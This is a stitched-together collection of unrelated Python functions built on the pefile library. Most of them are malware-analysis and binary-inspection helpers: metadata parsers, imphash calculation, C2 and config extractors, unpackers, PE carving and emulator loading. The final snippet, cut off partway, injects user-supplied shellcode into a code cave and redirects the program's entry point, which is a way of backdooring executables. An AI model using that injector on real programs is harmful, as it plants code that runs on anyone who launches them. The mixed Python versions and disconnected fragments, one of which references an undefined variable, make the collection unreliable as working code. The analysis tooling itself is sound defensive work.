def init_exports(self, pe: pefile.PE):
    if not Process.directory_exists(pe, 'IMAGE_DIRECTORY_ENTRY_EXPORT'):
        return
    # Do a full load if IMAGE_DIRECTORY_ENTRY_EXPORT is present so we can load the exports
    pe.full_load()
    iat = {}
    # parse directory entry export
    for entry in pe.DIRECTORY_ENTRY_EXPORT.symbols:
        ea = self.pe_image_address + entry.address
        self.export_symbols[ea] = {
            'name': entry.name,
            'ordinal': entry.ordinal
        }
        if entry.name:
            iat[entry.name] = ea
        iat[entry.ordinal] = ea
    dll_name = os.path.basename(self.path)
    self.import_address_table[dll_name.casefold()] = iat
def read(self):
    try:
        pe = PE(self.name, fast_load=True)
    except Exception:
        print('File %s is not a valid PE' % self.name)
        return False
    if not pe.is_exe():
        print('This file is not an exe')
        pe.close()
        return False
    section = None
    for s in pe.sections:
        if s.Name == b'.enigma1':
            section = s
            break
    if section is None:
        print('This file is not an Enigma Virtual Box container')
        pe.close()
        return False
    self.data = pe.get_data(section.VirtualAddress, section.SizeOfRawData)
    pe.close()
    return True
def get_icon_group(pe_file: pefile.PE, data_entry: pefile.Structure) -> Optional[list]:
    try:
        data_rva = data_entry.OffsetToData
        size = data_entry.Size
        data = pe_file.get_memory_mapped_image()[data_rva:data_rva + size]
        file_offset = pe_file.get_offset_from_rva(data_rva)
        grp_icon_dir = pefile.Structure(GRPICONDIR_format, file_offset=file_offset)
        grp_icon_dir.__unpack__(data)
        if grp_icon_dir.Reserved == 0 or grp_icon_dir.Type == 1:
            offset = grp_icon_dir.sizeof()
            entries = list()
            for idx in range(0, grp_icon_dir.Count):
                grp_icon = pefile.Structure(GRPICONDIRENTRY_format, file_offset=file_offset + offset)
                grp_icon.__unpack__(data[offset:])
                offset += grp_icon.sizeof()
                entries.append(grp_icon)
            return entries
    except pefile.PEFormatError:
        pass
    return None
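# Hedged usage sketch for get_icon_group(): walking the resource tree to find an
# RT_GROUP_ICON data entry. 'sample.exe' and the choice of the first group/first
# language entry are illustrative assumptions, not part of the original code.
import pefile

pe = pefile.PE('sample.exe')
for res_type in pe.DIRECTORY_ENTRY_RESOURCE.entries:
    if res_type.id == pefile.RESOURCE_TYPE['RT_GROUP_ICON']:
        group = res_type.directory.entries[0]                 # first icon group
        data_entry = group.directory.entries[0].data.struct   # first language
        print(get_icon_group(pe, data_entry))
        break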
def parse_file_info(cls, pe: PE) -> dict:
    """
    Extracts a JSON-serializable and human readable dictionary with information
    about the version resource of an input PE file, if available.
    """
    try:
        pe.parse_data_directories(directories=[
            DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_RESOURCE']
        ])
        FileInfoList = pe.FileInfo
    except AttributeError:
        return None
    for FileInfo in FileInfoList:
        for FileInfoEntry in FileInfo:
            with suppress(AttributeError):
                for StringTableEntry in FileInfoEntry.StringTable:
                    StringTableEntryParsed = cls._parse_pedict(StringTableEntry.entries)
                    with suppress(AttributeError):
                        LangID = StringTableEntry.entries.get('LangID', None) or StringTableEntry.LangID
                        LangID = int(LangID, 0x10) if not isinstance(LangID, int) else LangID
                        LangHi = LangID >> 0x10
                        LangLo = LangID & 0xFFFF
                        Language = cls._LCID.get(LangHi, 'Language Neutral')
                        Charset = cls._CHARSET.get(LangLo, 'Unknown Charset')
                        StringTableEntryParsed.update(
                            LangID=F'{LangID:08X}',
                            Charset=Charset,
                            Language=Language)
                    return StringTableEntryParsed
def get_bot_information(self, file_data):
    results = {}
    encrypted_section = file_data.rfind("\x44\x6d\x47\x00")
    if encrypted_section == -1:
        pe = PE(data=file_data)
        for x in range(len(pe.sections)):
            for s in data_strings(pe.get_data(pe.sections[x].VirtualAddress), 8,
                                  charset=ascii_uppercase + ascii_lowercase + digits + punctuation):
                if s.startswith("http://") and s != "http://":
                    if "c2s" not in results:
                        results["c2s"] = []
                    results["c2s"].append({"c2_uri": s})
    else:
        encrypted_section += 4
        encryption_key = None
        pe = PE(data=file_data)
        for s in data_strings(pe.get_data(pe.sections[3].VirtualAddress), 7):
            # keep the last string
            encryption_key = s
        if encryption_key is not None:
            rc4 = RC4(encryption_key)
            decrypted = "".join([chr(next(rc4) ^ ord(c)) for c in file_data[encrypted_section:]])
            for s in data_strings(decrypted, 8,
                                  charset=ascii_uppercase + ascii_lowercase + digits + punctuation):
                if s.startswith("http://") and s != "http://":
                    if "c2s" not in results:
                        results["c2s"] = []
                    results["c2s"].append({"c2_uri": s})
    return results
def pdb_guid(file):
    pe = PE(file, fast_load=True)
    pe.parse_data_directories()
    try:
        codeview = next(
            filter(
                lambda x: x.struct.Type == DEBUG_TYPE["IMAGE_DEBUG_TYPE_CODEVIEW"],
                pe.DIRECTORY_ENTRY_DEBUG,
            ))
    except StopIteration:
        print("Failed to find CodeView debug entry in PE")
        raise RuntimeError("Failed to find GUID age")
    offset = codeview.struct.PointerToRawData
    size = codeview.struct.SizeOfData
    tmp = CV_RSDS_HEADER.parse(pe.__data__[offset:offset + size])
    guidstr = "%08x%04x%04x%s%x" % (
        tmp.GUID.Data1,
        tmp.GUID.Data2,
        tmp.GUID.Data3,
        hexlify(tmp.GUID.Data4).decode("ascii"),
        tmp.Age,
    )
    return {"filename": tmp.Filename, "GUID": guidstr}
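# Example invocation of pdb_guid(); the path is illustrative. The GUID+Age string
# is the one used to build a Microsoft symbol server download path, e.g.
# https://msdl.microsoft.com/download/symbols/<pdb name>/<GUID>/<pdb name>
info = pdb_guid('C:/Windows/System32/ntoskrnl.exe')
print(info['filename'], info['GUID'])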
def getPE(file):
    # bail out if the file is not a valid PE
    try:
        PEFileInstance = PE(file)
    except PEFormatError:
        return
    yeet = PEFileInstance.dump_info().strip().split('\n')
    pedata = []
    keys = [
        'SizeOfOptionalHeader', 'Characteristics', 'MajorLinkerVersion',
        'MinorLinkerVersion', 'SizeOfCode', 'SizeOfInitializedData',
        'SizeOfUninitializedData', 'AddressOfEntryPoint', 'BaseOfCode',
        'BaseOfData', 'ImageBase', 'SectionAlignment', 'FileAlignment',
        'MajorOperatingSystemVersion', 'MinorOperatingSystemVersion',
        'MajorImageVersion', 'MinorImageVersion', 'MajorSubsystemVersion',
        'MinorSubsystemVersion', 'SizeOfImage', 'SizeOfHeaders', 'CheckSum',
        'Subsystem', 'DllCharacteristics', 'SizeOfStackReserve',
        'SizeOfStackCommit', 'SizeOfHeapReserve', 'SizeOfHeapCommit',
        'LoaderFlags', 'NumberOfRvaAndSizes', 'SectionsMeanVirtualsize',
        'SectionsMinVirtualsize', 'SectionMaxVirtualsize'
    ]
    for key in keys:
        for x in range(len(yeet)):
            if yeet[x].find(key) != -1:
                # dump_info() aligns values in a column starting at offset 48
                pedata.append(int(str(yeet[x][48:].strip()), 16))
                break
    print(pedata)
def parse_fileinfo(pe: pefile.PE):
    if has_resources(pe):
        # RT_VERSION, always 1?, any lang
        filevers = find_resources(pe, resourceid(16, 1, None), read_data=False)
        for filever in filevers:
            pe.parse_version_information(filever.struct)
    return has_fileinfo(pe)
def process(self, data):
    pe = PE(data=data, fast_load=True)
    pe.parse_data_directories(directories=[IMAGE_DIRECTORY_ENTRY_IMPORT])
    th = pe.get_imphash()
    if not th:
        raise ValueError('no import directory.')
    return th.encode(self.codec) if self.args.text else bytes.fromhex(th)
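# Standalone sketch of the same imphash computation, assuming only that pefile is
# installed and 'sample.exe' exists; pefile.PE.get_imphash() returns an empty
# string when there is no import directory.
import pefile

pe = pefile.PE('sample.exe', fast_load=True)
pe.parse_data_directories(directories=[
    pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_IMPORT']])
print(pe.get_imphash())
pe.close()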
def fileversion(pename):
    pe = PE(pename)
    verinfo = pe.VS_FIXEDFILEINFO[0]
    filever = (verinfo.FileVersionMS >> 16, verinfo.FileVersionMS & 0xFFFF,
               verinfo.FileVersionLS >> 16, verinfo.FileVersionLS & 0xFFFF)
    pe.close()
    return "%d.%d.%d.%d" % filever
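# Hedged usage example for fileversion(); the DLL path is an assumption.
print(fileversion('C:/Windows/System32/kernel32.dll'))  # e.g. '10.0.19041.3636'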
def __init__(self, path):
    self.path = path
    self.type = 'PE'
    self.parser = PE(path, fast_load=True)
    self.parser.parse_data_directories()
    self.imageBase = self.parser.OPTIONAL_HEADER.ImageBase
    self.entryPoint = self.parser.OPTIONAL_HEADER.AddressOfEntryPoint
    self.sections = []
    self.stringAddrs = []
    self.strings = self.strings()
    for section in self.parser.sections:
        s = Section(section.Name.decode().replace('\x00', ''),
                    section.VirtualAddress + self.imageBase,
                    section.Misc_VirtualSize)
        self.sections.append(s)
    self.imports = []
    for entry in self.parser.DIRECTORY_ENTRY_IMPORT:
        for imp in entry.imports:
            importFunc = ImportFunction(imp.name.decode(), imp.address, entry.dll.decode())
            self.imports.append(importFunc)
    self.exports = []
    if hasattr(self.parser, "DIRECTORY_ENTRY_EXPORT"):
        for exp in self.parser.DIRECTORY_ENTRY_EXPORT.symbols:
            exportFunc = ExportFunction(self.imageBase + exp.address, exp.name.decode())
            self.exports.append(exportFunc)
    self.findStrings()
def _algorithm(self, data):
    pe = PE(data=data, fast_load=True)
    pe.parse_data_directories(directories=[IMAGE_DIRECTORY_ENTRY_IMPORT])
    th = pe.get_imphash()
    if not th:
        raise ValueError('no import directory.')
    return bytes.fromhex(th)
def _add_pe_info(self):
    parsed_pe = PE(data=self._content)
    self._add_vs_info(parsed_pe)
    self._add_file_property('pe', 'imphash', parsed_pe.get_imphash())
    self._add_file_property(
        'pe', 'compilation',
        datetime.utcfromtimestamp(parsed_pe.FILE_HEADER.TimeDateStamp).isoformat())
def __determine_file_extension(parsed_pe_file: pefile.PE) -> str:
    if parsed_pe_file.is_dll():
        return 'dll'
    if parsed_pe_file.is_driver():
        return 'sys'
    if parsed_pe_file.is_exe():
        return 'exe'
    return 'bin'
def parse_time_stamps(cls, pe: PE, raw_time_stamps: bool) -> dict:
    """
    Extracts time stamps from the PE header (link time), as well as from the
    imports, exports, debug, and resource directory. The resource time stamp is
    also parsed as a DOS time stamp and returned as the "Delphi" time stamp.
    """
    if raw_time_stamps:
        def dt(ts):
            return ts
    else:
        def dt(ts):
            # parse as UTC but then forget time zone information
            return datetime.fromtimestamp(ts, tz=timezone.utc).replace(tzinfo=None)

    pe.parse_data_directories(directories=[
        DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_IMPORT'],
        DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_EXPORT'],
        DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_DEBUG'],
        DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_RESOURCE']
    ])

    info = {}

    with suppress(AttributeError):
        info.update(Linker=dt(pe.FILE_HEADER.TimeDateStamp))
    with suppress(AttributeError):
        for entry in pe.DIRECTORY_ENTRY_IMPORT:
            info.update(Import=dt(entry.TimeDateStamp()))
    with suppress(AttributeError):
        for entry in pe.DIRECTORY_ENTRY_DEBUG:
            info.update(DbgDir=dt(entry.struct.TimeDateStamp))
    with suppress(AttributeError):
        Export = pe.DIRECTORY_ENTRY_EXPORT.struct.TimeDateStamp
        if Export:
            info.update(Export=dt(Export))
    with suppress(AttributeError):
        res_timestamp = pe.DIRECTORY_ENTRY_RESOURCE.struct.TimeDateStamp
        if res_timestamp:
            with suppress(ValueError):
                from ...misc.datefix import datefix
                dos = datefix.dostime(res_timestamp)
                info.update(Delphi=dos)
                info.update(RsrcTS=dt(res_timestamp))

    def norm(value):
        if isinstance(value, int):
            return value
        return str(value)

    return {key: norm(value) for key, value in info.items()}
def unpack(self, data):
    cursor = 0
    mv = memoryview(data)
    while True:
        offset = data.find(B'MZ', cursor)
        if offset < cursor:
            break
        cursor = offset + 2
        ntoffset = mv[offset + 0x3C:offset + 0x3E]
        if len(ntoffset) < 2:
            return
        ntoffset, = unpack('H', ntoffset)
        if mv[offset + ntoffset:offset + ntoffset + 2] != B'PE':
            self.log_debug(F'invalid NT header signature for candidate at 0x{offset:08X}')
            continue
        try:
            pe = PE(data=data[offset:], fast_load=True)
        except PEFormatError as err:
            self.log_debug(F'parsing of PE header at 0x{offset:08X} failed:', err)
            continue
        pesize = get_pe_size(pe, memdump=self.args.memdump)
        pedata = mv[offset:offset + pesize]
        info = {}
        if self.args.fileinfo:
            try:
                info = pemeta().parse_version(pe) or {}
            except Exception as error:
                self.log_warn(F'Unable to obtain file information: {error!s}')
        try:
            path = info['OriginalFilename']
        except KeyError:
            extension = 'exe' if pe.is_exe() else 'dll' if pe.is_dll() else 'sys'
            path = F'carve-0x{offset:08X}.{extension}'
        if offset > 0 or self.args.keep_root:
            yield UnpackResult(path, pedata, offset=offset)
            self.log_info(F'extracted PE file of size 0x{pesize:08X} from 0x{offset:08X}')
        else:
            self.log_info(F'ignored root file of size 0x{pesize:08X} from 0x{offset:08X}')
            continue
        if not offset or self.args.recursive:
            cursor += pe.OPTIONAL_HEADER.SizeOfHeaders
        else:
            cursor += pesize
def parse_pe_fetch_pdb(symbol_server, file_path):
    '''
    Attempt to fetch a symbol that relates to a PE file. The file must have a valid
    IMAGE_DEBUG_DIRECTORY as well as an IMAGE_DEBUG_TYPE_CODEVIEW directory entry.
    '''
    try:
        guid = None
        pdb_filename = None
        pe = PE(file_path, fast_load=True)
        pe.parse_data_directories(directories=[DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_DEBUG']])
        code_view_entry = None
        for debug_entry in pe.DIRECTORY_ENTRY_DEBUG:
            if DEBUG_TYPE[debug_entry.struct.Type] == "IMAGE_DEBUG_TYPE_CODEVIEW":
                code_view_entry = debug_entry
                break
        if code_view_entry is None:
            logger.warn("%s doesn't have symbol information", basename(file_path))
            return None, None
        symbol_type_offset = code_view_entry.struct.PointerToRawData
        symbol_type_size = code_view_entry.struct.SizeOfData
        symbol_type_data = pe.__data__[symbol_type_offset:symbol_type_offset + symbol_type_size]
        if symbol_type_data[:4] == "RSDS":
            rsds = CV_RSDS_HEADER.parse(symbol_type_data)
            guid = "%08x%04x%04x%s%x" % (rsds.GUID.Data1, rsds.GUID.Data2, rsds.GUID.Data3,
                                         rsds.GUID.Data4.encode('hex'), rsds.Age)
            pdb_filename = ntbasename(rsds.Filename)
        elif symbol_type_data[:4] == "NB10":
            nb10 = CV_NB10_HEADER.parse(symbol_type_data)
            guid = "%x%x" % (nb10.Timestamp, nb10.Age)
            pdb_filename = ntbasename(nb10.Filename)
        else:
            logger.error("%s unsupported symbol type", symbol_type_data[:4])
            return None, None
        assert guid
        assert pdb_filename
        symbol = __fetch__(symbol_server, guid, file_path, pdb_filename)
        if symbol[:4] == 'MSCF':
            pass  # TODO, unpack cabinet
        else:
            logger.error("Expected symbol server to return a cabinet file")
            return None, None
        return symbol, basename(pdb_filename)
    except Exception:
        logger.error(format_exc())
        return None, None
def __init__(self, libpath):
    self.libpath = libpath
    self.pe = PE(libpath)
    last_section = self.pe.sections[-1]
    # In case of uninitialized data at the end of the section.
    # Not needed now, so not implemented.
    assert last_section.Misc_VirtualSize <= last_section.SizeOfRawData
    self.last_section = last_section
    # Set RWX
    self.last_section.IMAGE_SCN_MEM_WRITE = True
    self.last_section.IMAGE_SCN_MEM_EXECUTE = True
    # Move from mmap to str
    self.pe.__data__ = self.pe.__data__.read(self.pe.__data__.size())
class PEDebugData(object):
    def __init__(self, path, filename=None):
        self.pe = PE(path, fast_load=True)
        self.path = path
        self.filename = filename
        if filename is None:
            self.filename = os.path.basename(path)

    @property
    def symbol_id(self):
        return self.codeview_info().symbol_id

    @property
    def executable_id(self):
        retval = None
        if self.filename is not None:
            retval = '%s/%X%X' % (self.filename.lower(),
                                  self.pe.FILE_HEADER.TimeDateStamp,
                                  self.pe.OPTIONAL_HEADER.SizeOfImage)
        return retval

    def codeview_info(self):
        info = None
        data = self.debug_data()
        if data is not None:
            if data[:4] == 'RSDS':
                info = CodeViewRSDS(data)
            elif data[:4] == 'NB10':
                info = CodeViewNB10(data)
            else:
                raise PEUnknownDebugDataError('Unknown CodeView type: %s' % data[:4])
        else:
            raise PEMissingDebugDataError()
        return info

    def debug_data(self):
        data = None
        if not hasattr(self.pe, 'DIRECTORY_ENTRY_DEBUG'):
            self.pe.parse_data_directories(
                DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_DEBUG'])
        if hasattr(self.pe, 'DIRECTORY_ENTRY_DEBUG'):
            for entry in self.pe.DIRECTORY_ENTRY_DEBUG:
                off = entry.struct.PointerToRawData
                if (entry.struct.Type == DEBUG_TYPE['IMAGE_DEBUG_TYPE_CODEVIEW']
                        or entry.struct.Type == DEBUG_TYPE['IMAGE_DEBUG_TYPE_MISC']):
                    data = self.pe.__data__[off:off + entry.struct.SizeOfData]
                if data is not None:
                    break
        return data
def map_and_load(self, path, execute_now=False):
    ql = self.ql
    pe = PE(path, fast_load=True)

    # Make sure no module will occupy the NULL page
    if self.next_image_base > pe.OPTIONAL_HEADER.ImageBase:
        IMAGE_BASE = self.next_image_base
        pe.relocate_image(IMAGE_BASE)
    else:
        IMAGE_BASE = pe.OPTIONAL_HEADER.ImageBase
    IMAGE_SIZE = ql.mem.align(pe.OPTIONAL_HEADER.SizeOfImage, 0x1000)

    while IMAGE_BASE + IMAGE_SIZE < self.heap_base_address:
        if not ql.mem.is_mapped(IMAGE_BASE, 1):
            self.next_image_base = IMAGE_BASE + 0x10000
            ql.mem.map(IMAGE_BASE, IMAGE_SIZE)
            pe.parse_data_directories()
            data = bytearray(pe.get_memory_mapped_image())
            ql.mem.write(IMAGE_BASE, bytes(data))
            logging.info("[+] Loading %s to 0x%x" % (path, IMAGE_BASE))
            entry_point = IMAGE_BASE + pe.OPTIONAL_HEADER.AddressOfEntryPoint
            if self.entry_point == 0:
                # Setting entry point to the first loaded module entry point, so the debugger can break.
                self.entry_point = entry_point
            logging.info("[+] PE entry point at 0x%x" % entry_point)
            self.install_loaded_image_protocol(IMAGE_BASE, IMAGE_SIZE)
            self.images.append(
                self.coverage_image(
                    IMAGE_BASE,
                    IMAGE_BASE + pe.NT_HEADERS.OPTIONAL_HEADER.SizeOfImage,
                    path))
            if execute_now:
                logging.info(f'[+] Running from 0x{entry_point:x} of {path}')
                assembler = self.ql.create_assembler()
                code = f"""
                    mov rcx, {IMAGE_BASE}
                    mov rdx, {self.gST}
                    mov rax, {entry_point}
                    call rax
                """
                runcode, _ = assembler.asm(code)
                ptr = ql.os.heap.alloc(len(runcode))
                ql.mem.write(ptr, bytes(runcode))
                ql.os.exec_arbitrary(ptr, ptr + len(runcode))
            else:
                self.modules.append((path, IMAGE_BASE, entry_point, pe))
            return True
        else:
            IMAGE_BASE += 0x10000
            pe.relocate_image(IMAGE_BASE)
    return False
def hash_module(imm, module_name):
    """Calculate an MD5 hash of each section in a given module.

    The results are displayed in the log window.

    Args:
        imm: Immunity debugger object
        module_name: Name of the module to hash

    Returns:
        String describing the success/failure of the operation
    """
    if module_name.split('.')[-1] not in ('exe', 'sys', 'dll'):
        module_name = '%s.dll' % module_name
    module = imm.getModule(module_name)
    if not module:
        return '%s is not a loaded module' % module_name
    pe = PE(name=module.getPath())
    for section in pe.sections:
        section_name = section.Name.split('\x00')[0]
        start = module.getBaseAddress() + section.VirtualAddress
        virtual_size = section.Misc_VirtualSize
        alignment = pe.OPTIONAL_HEADER.SectionAlignment
        size = virtual_size + (alignment - virtual_size % alignment)
        data = imm.readMemory(start, size)
        md5sum = md5(data).hexdigest()
        imm.log('%s %s MD5: %s' % (module.name, section_name, md5sum))
    return 'Calculated hash for %s' % module.name
def get_pe_size(pe: Union[PE, ByteString], overlay=True, sections=True,
                directories=True, cert=True) -> int:
    """
    This function determines the size of a PE file, optionally taking into account
    the pefile module overlay computation, section information, data directory
    information, and certificate entries.
    """
    if not isinstance(pe, PE):
        pe = PE(data=pe, fast_load=True)
    overlay_value = overlay and pe.get_overlay_data_start_offset() or 0
    sections_value = sections and max(
        s.PointerToRawData + s.SizeOfRawData for s in pe.sections) or 0
    directories_value = directories and max(
        pe.get_offset_from_rva(d.VirtualAddress) + d.Size
        for d in pe.OPTIONAL_HEADER.DATA_DIRECTORY) or 0
    if cert:
        # The certificate overlay is given as a file offset
        # rather than a virtual address.
        cert_entry = pe.OPTIONAL_HEADER.DATA_DIRECTORY[IMAGE_DIRECTORY_ENTRY_SECURITY]
        cert_value = cert_entry.VirtualAddress + cert_entry.Size
    else:
        cert_value = 0
    return max(overlay_value, sections_value, directories_value, cert_value)
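# Usage sketch for get_pe_size(): feed it raw bytes (or an already parsed PE) to
# decide how many bytes of a buffer belong to the PE image. 'sample.exe' is a
# placeholder path.
with open('sample.exe', 'rb') as f:
    blob = f.read()
print(get_pe_size(blob))              # full size including the certificate overlay
print(get_pe_size(blob, cert=False))  # ignore the Authenticode certificate entry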
def get_pe_info(target):
    row = [0] * (len(DLL_API_FEATURES) + len(SECTION_NAMES))
    try:
        pe = PE(target)
    except PEFormatError:
        # log.exception("%s, not valid PE File" % target)
        return None
    if hasattr(pe, "DIRECTORY_ENTRY_IMPORT"):
        for entry in pe.DIRECTORY_ENTRY_IMPORT:
            dll = norm_str(entry.dll)
            if dll in DLL_API_FEATURES:
                index = DLL_API_FEATURES.index(dll)
                row[index] = 1
            for imp in entry.imports:
                api = norm_str(imp.name)
                if api in DLL_API_FEATURES:
                    index = DLL_API_FEATURES.index(api)
                    row[index] = 1
    else:
        return None
    for section in pe.sections:
        se = norm_str(section.Name)
        if se in SECTION_NAMES:
            index = SECTION_NAMES.index(se)
            row[index + len(DLL_API_FEATURES)] = 1
        else:
            row[-1] += 1
    # change list to string
    return ",".join(map(str, row))
def process(self, data: bytearray) -> bytearray:
    pe = PE(data=data, fast_load=True)
    pe.parse_data_directories(directories=[self._SECDIRID])
    security = pe.OPTIONAL_HEADER.DATA_DIRECTORY[self._SECDIRID]
    sgnoff = security.VirtualAddress + 8
    sgnend = sgnoff + security.Size
    length, revision, certtype = unpack('<IHH', data[sgnoff - 8:sgnoff])
    signature = data[sgnoff:sgnend]
    if len(signature) + 8 != length:
        raise RefineryPartialResult(
            F'Found {len(signature) + 8} bytes of signature, but length should be {length}.',
            partial=signature)
    return signature
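# Standalone sketch (pefile + struct only; the path is an assumption) of the same
# Authenticode extraction: the security directory's VirtualAddress is a raw file
# offset to a WIN_CERTIFICATE header (dwLength, wRevision, wCertificateType)
# followed by the PKCS#7 blob.
import struct
import pefile

pe = pefile.PE('signed.exe', fast_load=True)
sec = pe.OPTIONAL_HEADER.DATA_DIRECTORY[
    pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']]
if sec.VirtualAddress and sec.Size:
    raw = pe.__data__[sec.VirtualAddress:sec.VirtualAddress + sec.Size]
    length, revision, cert_type = struct.unpack('<IHH', bytes(raw[:8]))
    print(length, 'byte WIN_CERTIFICATE,', len(raw[8:length]), 'bytes of PKCS#7 data')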
def initialize(self):
    self.file_handle = open(self.wow_binary, 'rb')
    self.handle = mmap.mmap(self.file_handle.fileno(), 0, access=mmap.ACCESS_READ)
    self.pe = PE(data=self.handle, fast_load=True)
    logging.info('{} ImageBase={:#016x}'.format(
        self.wow_binary, self.pe.OPTIONAL_HEADER.ImageBase))
    self.image_base = self.pe.OPTIONAL_HEADER.ImageBase
    for section in self.pe.sections:
        if b'.rdata' in section.Name:
            self.rdata_start = section.PointerToRawData
            self.rdata_end = self.rdata_start + section.SizeOfRawData
            self.rdata_voffset = section.VirtualAddress
            logging.info(
                ('{} .rdata found at PhysicalAddress={:#08x} '
                 'VirtualAddress={:#08x}').format(self.wow_binary,
                                                  self.rdata_start,
                                                  self.rdata_voffset))
    return True
def _extract_messagetable(dll: pefile.PE, locale_id: LocaleID) -> Mapping[int, str]:
    mmap = dll.get_memory_mapped_image()
    entries = dll.DIRECTORY_ENTRY_RESOURCE.entries
    offset, size = _traverse_resources(entries, (RT_MESSAGETABLE, 1, locale_id.value))
    data = mmap[offset:offset + size]
    return dict(_read_messagetable_resource(data))
def get_pe(self, force=False):
    """
    Returns the pefile.PE object if the file is actually a PE

    Args:
        force: Disable extension detection for PE files (default False)

    Returns:
        pefile.PE
        None
    """
    if not PEFILE_SUPPORT:
        return None
    if force or self.__attrs['path'].suffix in ['.dll', '.exe', '.sys']:
        try:
            data = self.get_data()
            self.pe_data = PE(name=str(self.__attrs['path']), data=data, fast_load=True)
            return self.pe_data
        except PEFormatError:
            return None
        except Exception:
            return None
    return None
def dump_image(uc, base_addr, virtualmemorysize, path="unpacked.exe"):
    print(f"Dumping state to {path}")
    loaded_img = uc.mem_read(base_addr, virtualmemorysize + 0x3000)
    pe = PE(data=loaded_img)

    header_size = align(len(pe.header))
    pe.sections[0].PointerToRawData = header_size
    # make the section 2 GiB ... pefile truncates to the actual max size of data
    pe.sections[0].SizeOfRawData = 0x80000000
    pe.sections[0].Misc_VirtualSize = len(pe.sections[0].get_data())

    for section in pe.sections[1:]:
        section.SizeOfRawData = 0
        section.Misc_VirtualSize = 0

    pe.write(path)
def get_version(data):
    pe = PE(data=data)
    info = pe.VS_FIXEDFILEINFO[0]
    return '.'.join(
        map(str, [
            info.FileVersionMS >> 16,
            info.FileVersionMS & 0xFFFF,
            info.FileVersionLS >> 16,
            info.FileVersionLS & 0xFFFF
        ]))
def _pesize(self, pe: PE) -> int:
    overlay = pe.get_overlay_data_start_offset() or 0
    maxaddr = max(s.PointerToRawData + s.SizeOfRawData for s in pe.sections)
    maxdata = max(
        pe.get_offset_from_rva(d.VirtualAddress) + d.Size
        for d in pe.OPTIONAL_HEADER.DATA_DIRECTORY)
    # The certificate overlay is given as a file offset
    # rather than a virtual address.
    cert = pe.OPTIONAL_HEADER.DATA_DIRECTORY[
        DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']]
    certend = cert.VirtualAddress + cert.Size
    self.log_debug(F'overlay at 0x{overlay:08X}')
    self.log_debug(F'maxaddr at 0x{maxaddr:08X}')
    self.log_debug(F'maxdata at 0x{maxdata:08X}')
    self.log_debug(F'certend at 0x{certend:08X}')
    return max(overlay, maxaddr, maxdata, certend)
def restore_pe(file):
    from pefile import PE
    pe = PE(file, fast_load=True)
    # Helpers
    find_section = lambda name: next(filter(lambda x: name in x.Name, pe.sections))
    find_data_directory = lambda name: next(
        filter(lambda x: name in x.name, pe.OPTIONAL_HEADER.DATA_DIRECTORY))
    # Remove .enigma sections
    pe.__data__ = pe.__data__[:find_section(b'.enigma1').PointerToRawData]
    pe.FILE_HEADER.NumberOfSections -= 2
    # Restore rdata & idata sections
    find_data_directory('TLS').VirtualAddress = find_section(b'.rdata').VirtualAddress
    find_data_directory('ENTRY_IMPORT').VirtualAddress = find_section(b'.idata').VirtualAddress
    # Write to new file
    pe_name = os.path.basename(file)[:-4] + ORIGINAL_PE_SUFFIX
    pe_name = os.path.join(output, pe_name).replace('\\', '/')
    pe.write(pe_name)
    print('[-] Original PE saved:', pe_name)
def configExtract(rawData):
    pe = PE(data=rawData)
    try:
        rt_string_idx = [
            entry.id for entry in pe.DIRECTORY_ENTRY_RESOURCE.entries
        ].index(RESOURCE_TYPE['RT_RCDATA'])
    except ValueError:
        return None
    except AttributeError:
        return None
    rt_string_directory = pe.DIRECTORY_ENTRY_RESOURCE.entries[rt_string_idx]
    for entry in rt_string_directory.directory.entries:
        if str(entry.name) == "CFG":
            data_rva = entry.directory.entries[0].data.struct.OffsetToData
            size = entry.directory.entries[0].data.struct.Size
            data = pe.get_memory_mapped_image()[data_rva:data_rva + size]
            return data
def get_bot_information(self, file_data):
    results = {}
    gate = None
    server = None
    pe = PE(data=file_data)
    for x in range(len(pe.sections)):
        for s in data_strings(pe.get_data(pe.sections[x].VirtualAddress)):
            if s.find(".php") != -1:
                if s[0] != "/":
                    s = "/" + s
                if gate is None:
                    gate = set()
                gate.add(s)
            if is_ip_or_domain(s):
                if server is None:
                    server = set()
                server.add(s)
    if server is not None and gate is not None:
        results["c2s"] = []
        for ip in server:
            for p in gate:
                uri = "%s%s" % (ip, p)
                results["c2s"].append({"c2_uri": uri})
    return results
def config_extract(raw_data):
    try:
        pe = PE(data=raw_data)
        try:
            rt_string_idx = [
                entry.id for entry in pe.DIRECTORY_ENTRY_RESOURCE.entries
            ].index(RESOURCE_TYPE['RT_RCDATA'])
        except ValueError:
            return None
        except AttributeError:
            return None
        rt_string_directory = pe.DIRECTORY_ENTRY_RESOURCE.entries[rt_string_idx]
        for entry in rt_string_directory.directory.entries:
            if str(entry.name) == "XX-XX-XX-XX" or str(entry.name) == "CG-CG-CG-CG":
                data_rva = entry.directory.entries[0].data.struct.OffsetToData
                size = entry.directory.entries[0].data.struct.Size
                data = pe.get_memory_mapped_image()[data_rva:data_rva + size]
                config = data.split('####@####')
                return config
    except Exception:
        return None
def main(exe_file, shellcode):
    if not os.path.isfile(exe_file):
        print("\nExecutable file can't be found!\nPlease try with the full path.\n")
        return False
    shellcode = shellcode.replace("\\x", "").decode("hex")
    pe = PE(exe_file)
    OEP = pe.OPTIONAL_HEADER.AddressOfEntryPoint
    pe_sections = pe.get_section_by_rva(pe.OPTIONAL_HEADER.AddressOfEntryPoint)
    align = pe.OPTIONAL_HEADER.SectionAlignment
    what_left = (pe_sections.VirtualAddress + pe_sections.Misc_VirtualSize) - pe.OPTIONAL_HEADER.AddressOfEntryPoint
    end_rva = pe.OPTIONAL_HEADER.AddressOfEntryPoint + what_left
    padd = align - (end_rva % align)
    e_offset = pe.get_offset_from_rva(end_rva + padd) - 1
    scode_size = len(shellcode) + 7
    if padd < scode_size:
        print("\nNot enough space is available for the shellcode")
        print("Available codecave length: {0}\n".format(covecavelenght(pe)))
        return False
    else:
        scode_end_off = e_offset
        scode_start_off = scode_end_off - scode_size
        pe.OPTIONAL_HEADER.AddressOfEntryPoint = pe.get_rva_from_offset(scode_start_off)
